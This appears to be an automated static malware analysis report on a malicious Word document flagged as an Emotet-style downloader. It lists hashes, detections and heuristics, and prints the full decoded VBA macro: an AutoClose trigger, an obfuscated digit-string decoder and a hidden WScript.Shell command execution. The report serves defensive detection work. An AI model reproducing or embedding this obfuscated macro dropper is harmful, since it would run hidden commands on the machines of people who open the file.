Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 ebf4d1f9396d6ab1…

MALICIOUS

Office (OOXML)

36.3 KB Created: 2017-10-25 18:34:00 UTC Authoring application: Microsoft Office Word 12.0000 First seen: 2020-02-04
MD5: b0d0b281554f8fbe9f6af749a0bd9239 SHA-1: 5be7b445857ba4091ca81b768dba7e09698fce76 SHA-256: ebf4d1f9396d6ab1aff5b3cc6c8e682e1291c49bbbe51ac5c797dc252833909f
352 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is an OOXML document containing VBA macros. The AutoClose macro triggers the execution of a WScript.Shell object, which is used to run a command. This command is constructed from a heavily obfuscated string within the VBA code, likely a URL or command to download and execute a secondary payload. The presence of WScript.Shell and Auto_Close macros strongly indicates a malicious intent to execute arbitrary code.

Heuristics 9

  • ClamAV: Doc.Malware.Emooodldr-6711604-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emooodldr-6711604-0
  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
    Matched line in script
      If Len(melis) >= 19 Then
    Call CreateObject("WScript.Shell").Run(melis, vbHide)
  End If
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
      If Len(melis) >= 19 Then
    Call CreateObject("WScript.Shell").Run(melis, vbHide)
  End If
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
      If Len(melis) >= 19 Then
    Call CreateObject("WScript.Shell").Run(melis, vbHide)
  End If
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    Sub AutoClose()
 Call Application.Run("calibro", svizzera("0621271226033312090915224821203431021522203412251505420607030315224521010107510415184812272238475012250215394203021201534812025319124745093112510214534321275109210704163109121813330202061040400706504724500703042412121212532521014046354002262151475306422513111536125129103237374332303215281513414635490223090217531234121314001539020726022237262125120303153612512910323737433230321341463549022309021753123412130015184812272238475012250215394203021201534812025 …
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/markup-compatibility/2006 In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2010/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 2496 bytes
SHA-256: b0f1aae9b349bc8a9dfd17f503fe3cb8c1c552e36c732e01be33440af688c5b9
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Function riportare(forbito As Integer) As String
 sportivo = Array(";", "m", "t", "s", "d", "B", "p", "a", "?", "l", ":", ",", "e", "'", ")", " ", "F", "Z", "(", "W", "E", "o", "-", "f", "q", "c", "r", "w", "+", "v", "T", "i", "A", "h", "x", "L", "$", "P", "O", "S", "/", "\", "y", "D", "=", "C", "X", "b", "N", "z", "j", "n", "g", ".")
 Dim svolta As Integer
 
 For svolta = LBound(sportivo) To UBound(sportivo)
   If svolta = forbito Then
    riportare = sportivo(svolta)
   End If
 Next
 
End Function


Public Function calibro(melis As String)
  If Len(melis) >= 19 Then
    Call CreateObject("WScript.Shell").Run(melis, vbHide)
  End If
End Function

Sub AutoClose()
 Call Application.Run("calibro", svizzera("0621271226033312090915224821203431021522203412251505420607030315224521010107510415184812272238475012250215394203021201534812025319124745093112510214534321275109210704163109121813330202061040400706504724500703042412121212532521014046354002262151475306422513111536125129103237374332303215281513414635490223090217531234121314001539020726022237262125120303153612512910323737433230321341463549022309021753123412130015184812272238475012250215394203021201534812025319124745093112510214534321275109210704390226315152181333020206104040070650472450070304241212121253252101400353063306083104440226215147131400"))
End Sub

Function buio(ByVal snodo As String, ByVal sembrare As String)
 oggetto = ""
 
 roditore = Array(snodo, sembrare)
 For asettico = 0 To UBound(roditore)
   oggetto = oggetto & "" & roditore(asettico)
 Next
 
 buio = oggetto
End Function

Function svizzera(Optional afoso As String, Optional afoso2)
  sintesi = lacuna(Trim(afoso))
  atavico = ""

  For svolta = 0 To Len(afoso)
    If (svolta + 1) <= UBound(sintesi) Then
    abrogato = sintesi(svolta)
    famiglia = riportare(Int(abrogato + sintesi(svolta + 1)))
    atavico = buio(atavico, famiglia)
    svolta = svolta + 1
    End If
  Next
  
  svizzera = atavico
End Function


Function lacuna(ovocito As String, Optional sposo As Integer) As Variant
    lacuna = Split(Left(StrConv(ovocito, vbUnicode), Len(StrConv(ovocito, vbUnicode)) - 1), vbNullChar)
End Function
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 12288 bytes
SHA-256: ae4b8e8efe3ea24fb8562c8991ce3b6ef6868bcabef5cad60e43ad0fe42e4fd3
Detection
ClamAV: Doc.Malware.Emooodldr-6711604-0
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).

Open this report in the interactive analyzer, or submit your own file for analysis.